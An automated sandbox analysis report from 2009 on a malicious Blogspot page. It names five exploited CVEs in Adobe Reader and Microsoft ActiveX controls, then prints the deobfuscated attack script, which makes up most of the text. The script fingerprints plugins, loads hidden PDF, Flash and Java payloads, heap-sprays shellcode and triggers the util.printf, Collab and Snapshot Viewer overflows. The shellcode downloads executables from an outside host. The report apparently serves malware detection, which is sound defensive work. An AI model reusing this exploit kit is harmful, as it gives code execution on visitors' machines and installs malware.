Analysis report for http://bertilladingman36429.blogspot.com/
Sample Overview
| URL | http://bertilladingman36429.blogspot.com/ |
|---|---|
| MD5 | d55aea59cd61215efb5782772322b59d |
| Analysis Started | 2009-10-09 12:04:39 |
| Report Generated | 2009-10-09 12:04:53 |
| Jsand version | 1.03.02 |
See the report for domain bertilladingman36429.blogspot.com.
Detection results
| Detector | Result |
|---|---|
| Jsand 1.03.02 | malicious |
Exploits
| Name | Description | Reference |
|---|---|---|
| Office Snapshot Viewer | The Microsoft Office Snapshot Viewer ActiveX control allows remote attackers to download arbitrary files to a client machine | CVE-2008-2463 |
| Adobe Collab overflow | Multiple Adobe Reader and Acrobat buffer overflows | CVE-2007-5659 |
| Adobe util.printf overflow | Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf | CVE-2008-2992 |
| Adobe getIcon | Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object | CVE-2009-0927 |
| MsVidCtl Overflow | Overflow in Microsoft Video ActiveX Control via specially-crafted data parameter | CVE-2008-0015 |
Deobfuscation results
Evals
- (repeated 1 time)
function aegjns(){ if (1 == 2){ setTimeout('location.href = "http://cnyswatmop.com"', 5000); } else { setTimeout('location.href = "http://cnyswatmop.com"', 9000); } } function biqty(){ var acdrw = false; if (navigator.plugins && navigator.plugins.length){ for (var bdnxy = 0; bdnxy < navigator.plugins.length; bdnxy ++ ){ if (navigator.plugins[bdnxy].description.indexOf('Adobe Acrobat') !=- 1){ acdrw = true; break ; } if (navigator.plugins[bdnxy].description.indexOf('Adobe PDF') !=- 1){ acdrw = true; break ; } } } else if (window.ActiveXObject){ var npwx = null; try { npwx = new ActiveXObject('AcroPDF.PDF'); } catch (e){ } if (!npwx){ try { npwx = new ActiveXObject('PDF.PdfCtrl'); } catch (e){ } } if (npwx){ acdrw = true; } } if (acdrw){ var ua = navigator.userAgent.toLowerCase(); if (ua.indexOf("firefox") !=- 1){ var behuy = document.createElement('embed'); behuy.setAttribute('src', './bgrx.pdf'); behuy.setAttribute('href', './bgrx.pdf'); behuy.setAttribute('type', 'application/pdf'); behuy.setAttribute('width', 15); behuy.setAttribute('height', 19); behuy.setAttribute('style', 'display:none;'); document.body.appendChild(behuy); } else { var behuy = document.createElement('iframe'); behuy.setAttribute('src', './bgrx.pdf'); behuy.setAttribute('width', 15); behuy.setAttribute('height', 20); behuy.setAttribute('style', 'display:none;'); document.body.appendChild(behuy); } setTimeout(dlmt(), 425); return ; } dlmt(); return ; } function dlmt(){ var PlayerVersion = [0, 0, 0]; if (navigator.plugins && navigator.mimeTypes.length){ var x = navigator.plugins["Shockwave Flash"]; if (x && x.description){ PlayerVersion = x.description.replace(/([a-zA-Z]|\s)+/, "").replace( /(\s+r|\s+b[0-9]+)/, ".").split("."); } } else { try { var fv = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); if (fv != null){ PlayerVersion = fv.GetVariable("\$version").split(" ")[1].split(","); } } catch (e){ cdjsvx(); return ; } } var version1 = PlayerVersion[0] != null ? 
parseInt(PlayerVersion[0]) : 0; var version2 = PlayerVersion[1] != null ? parseInt(PlayerVersion[1]) : 0; var version3 = PlayerVersion[2] != null ? parseInt(PlayerVersion[2]) : 0; if (version1 == 9 && version3 < 124){ var ua = navigator.userAgent.toLowerCase(); if (ua.indexOf("firefox") !=- 1){ var swfelement = document.createElement('embed'); document.body.appendChild(swfelement); swfelement.width = '1'; swfelement.height = '1'; swfelement.src = './manual.swf'; swfelement.type = 'application/x-shockwave-flash'; } else { var swfelement = document.createElement('iframe'); swfelement.setAttribute('src', './manual.swf'); swfelement.setAttribute('width', 200); swfelement.setAttribute('height', 200); swfelement.setAttribute('style', 'display:none;'); document.body.appendChild(swfelement); } } cdjsvx(); } function cdjsvx(){ var rwoLXUtl = ' <applet code="myf.y.AppletX.class" archive="http://pipisechka.com/sleep/sdfg.jar" width="3 00" height="300">' + '<param name="data" value="http://pipisechka.com/sleep/dshdsgfh4.exe?jas">' + '<param name="cc" value="1">' + '</applet>'; var NZWhjVxX = document.createElement("div"); NZWhjVxX.innerHTML = rwoLXUtl; document.body.appendChild(NZWhjVxX); fiqrvw(); } function fiqrvw(){ var shellcode = unescape(" %uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845 %u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057 %u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14 %u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B %u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603 %uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3 %uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589 %u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6 
%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE %uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75 %u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08 %uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC %u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6 %u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC %uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D %u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708 %u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000 %u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856 %u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D %u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8 %u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351 %u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A %uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45 %u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u702F%u7069%u7369%u6365%u6B68%u2E61%u6F63%u2F6D %u6C73%u6565%u2F70%u6473%u7367%u3567%u652E%u6578%u6800%u7474%u3A70%u2F2F%u6970%u6970%u6573 %u6863%u616B%u632E%u6D6F%u732F%u656C%u7065%u632F%u696C%u6B63%u702E%u7068%u723F%u003D"); var bigblock = unescape("%u9090%u9090"); var headersize = 20; var slackspace = headersize + shellcode.length; while (bigblock.length < slackspace)bigblock += bigblock; var fillblock = bigblock.substring(0, slackspace); var block = bigblock.substring(0, bigblock.length - slackspace); while (block.length + slackspace < 0x40000){ block = block + block + fillblock; 
} var memory = new Array(); for (var i = 0; i < 350; i ++ ){ memory[i] = block + shellcode; } var fnpu = document.createElement('object'); fnpu.setAttribute('width', 1); fnpu.setAttribute('height ', 1); fnpu.setAttribute('data', './cilpqxds.jpg'); fnpu.setAttribute('classid', 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF'); document.body.appendChild(fnpu); qsuxy(); } function qsuxy(){ var hjlm; var fhim; var dhqry = new Array(); dhqry[0] = 'c:/Program Files/Outlook Express/wab.exe'; dhqry[1] = 'd:/Program Files/Outlook Express/wab.exe'; dhqry[2] = 'e:/Program Files/Outlook Express/wab.exe'; try { var fhim = new ActiveXObject('snpvw.Snapshot Viewer Control.1'); } catch (e){ try { var fhim = document.createElement('object'); fhim.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'); fhim.setAttribute('id', 'fhim'); fhim.setAttribute('width', '1'); fhim.setAttribute('height', '1'); document.body.appendChild(fhim); } catch (e){ aegjns(); return ; } } if (fhim = '[object]'){ for (hjlmin dhqry){ try { fhim = new ActiveXObject('snpvw.Snapshot Viewer Control.1'); var buf = dhqry[hjlm]; fhim.Zoom = 0; fhim.ShowNavigationButtons = false; fhim.AllowContextMenu = false; fhim.SnapshotPath = 'http://pipisechka.com/sleep/cdkpsv7.exe'; fhim.CompressedPath = buf; fhim.PrintSnapshot(); var afhiqs = document.createElement('iframe'); afhiqs.setAttribute('id', 'afhiqs'); afhiqs.setAttribute('src', 'ldap://127.0.0.1'); afhiqs.setAttribute('width', 1); afhiqs.setAttribute('height', 1); afhiqs.setAttribute('style', 'display:none;'); document.body.appendChild(afhiqs); var hkopw = setInterval(adjqv(), 2100); } catch (e){ aegjns(); return ; } } } aegjns(); return ; } function adjqv(){ if (fhim.readyState == 4){ clearInterval(hkopw); } } biqty();
- (repeated 1 time)
function fix_it(yarsp, len){ while (yarsp.length * 2 < len){ yarsp += yarsp; } yarsp = yarsp.substring(0, len / 2); return yarsp; } function util_printf(){ var payload = unescape(" %uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845 %u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057 %u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14 %u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B %u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603 %uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3 %uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589 %u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6 %u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE %uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75 %u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08 %uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC %u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6 %u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC %uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D %u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708 %u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000 %u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856 %u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D 
%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8 %u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351 %u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A %uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45 %u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u702F%u7069%u7369%u6365%u6B68%u2E61%u6F63%u2F6D %u6C73%u6565%u2F70%u6361%u716D%u7875%u2E32%u7865%u0065%u7468%u7074%u2F3A%u702F%u7069%u7369 %u6365%u6B68%u2E61%u6F63%u2F6D%u6C73%u6565%u2F70%u6C63%u6369%u2E6B%u6870%u3F70%u3D72%u0000" ); var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")var heapblock = nop + payload; var bigblock = unescape("%u0A0A%u0A0A"); var headersize = 20; var spray = headersize + heapblock.length; while (bigblock.length < spray){ bigblock += bigblock; } var fillblock = bigblock.substring(0, spray); var block = bigblock.substring(0, bigblock.length - spray); while (block.length + spray < 0x40000){ block = block + block + fillblock; } var mem_array = new Array(); for (var i = 0; i < 1400; i ++ ){ mem_array[i] = block + heapblock; } var num = 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 88888888888888888888888888; util.printf("%45000f", num); } function collab_email(){ var shellcode = unescape(" %uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845 %u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057 %u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14 %u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B 
%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603 %uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3 %uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589 %u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6 %u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE %uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75 %u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08 %uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC %u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6 %u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC %uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D %u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708 %u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000 %u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856 %u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D %u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8 %u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351 %u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A %uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45 %u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u702F%u7069%u7369%u6365%u6B68%u2E61%u6F63%u2F6D %u6C73%u6565%u2F70%u7066%u7674%u2E32%u7865%u0065%u7468%u7074%u2F3A%u702F%u7069%u7369%u6365 %u6B68%u2E61%u6F63%u2F6D%u6C73%u6565%u2F70%u6C63%u6369%u2E6B%u6870%u3F70%u3D72%u0000"); 
var mem_array = new Array(); var cc = 0x0c0c0c0c; var addr = 0x400000; var sc_len = shellcode.length * 2; var len = addr - (sc_len + 0x38); var yarsp = unescape("%u9090%u9090"); yarsp = fix_it(yarsp, len); var count2 = (cc - 0x400000) / addr; for (var count = 0; count < count2; count ++ ){ mem_array[count] = yarsp + shellcode; } var overflow = unescape("%u0c0c%u0c0c"); while (overflow.length < 44952){ overflow += overflow; } this .collabStore = Collab.collectEmailInfo({ subj : "", msg : overflow } ); } function collab_geticon(){ if (app.doc.Collab.getIcon){ var arry = new Array(); var vvpethya = unescape(" %uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845 %u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057 %u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14 %u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B %u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603 %uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3 %uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589 %u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6 %u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE %uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75 %u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08 %uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC %u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6 %u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC %uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D 
%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708 %u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000 %u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856 %u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D %u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8 %u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351 %u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A %uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45 %u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u702F%u7069%u7369%u6365%u6B68%u2E61%u6F63%u2F6D %u6C73%u6565%u2F70%u6E67%u6962%u327A%u652E%u6578%u6800%u7474%u3A70%u2F2F%u6970%u6970%u6573 %u6863%u616B%u632E%u6D6F%u732F%u656C%u7065%u632F%u696C%u6B63%u702E%u7068%u723F%u003D"); var hWq500CN = vvpethya.length * 2; var len = 0x400000 - (hWq500CN + 0x38); var yarsp = unescape("%u9090%u9090"); yarsp = fix_it(yarsp, len); var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000; for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){ arry[vqcQD96y] = yarsp + vvpethya; } var tUMhNbGw = unescape("%09"); while (tUMhNbGw.length < 0x4000){ tUMhNbGw += tUMhNbGw; } tUMhNbGw = "N." + tUMhNbGw; app.doc.Collab.getIcon(tUMhNbGw); } } function pdf_start(){ var version = app.viewerVersion.toString(); version = version.replace(/\D/g, ''); var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2)); if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && varsion_array[2] < 3)){ util_printf(); } if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)){ collab_email(); } if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)){ collab_geticon(); } } pdf_start();
- (repeated 1 time)
function fix_it(yarsp, len){ while (yarsp.length * 2 < len){ yarsp += yarsp; } yarsp = yarsp.substring(0, len / 2); return yarsp; } function util_printf(){ var payload = unescape(" %uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845 %u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057 %u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14 %u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B %u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603 %uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3 %uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589 %u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6 %u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE %uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75 %u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08 %uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC %u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6 %u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC %uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D %u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708 %u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000 %u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856 %u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D 
%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8 %u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351 %u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A %uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45 %u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u702F%u7069%u7369%u6365%u6B68%u2E61%u6F63%u2F6D %u6C73%u6565%u2F70%u656C%u7A6B%u3276%u652E%u6578%u6800%u7474%u3A70%u2F2F%u6970%u6970%u6573 %u6863%u616B%u632E%u6D6F%u732F%u656C%u7065%u632F%u696C%u6B63%u702E%u7068%u723F%u003D"); var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")var heapblock = nop + payload; var bigblock = unescape("%u0A0A%u0A0A"); var headersize = 20; var spray = headersize + heapblock.length; while (bigblock.length < spray){ bigblock += bigblock; } var fillblock = bigblock.substring(0, spray); var block = bigblock.substring(0, bigblock.length - spray); while (block.length + spray < 0x40000){ block = block + block + fillblock; } var mem_array = new Array(); for (var i = 0; i < 1400; i ++ ){ mem_array[i] = block + heapblock; } var num = 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 88888888888888888888888888; util.printf("%45000f", num); } function collab_email(){ var shellcode = unescape(" %uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845 %u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057 %u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14 %u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B 
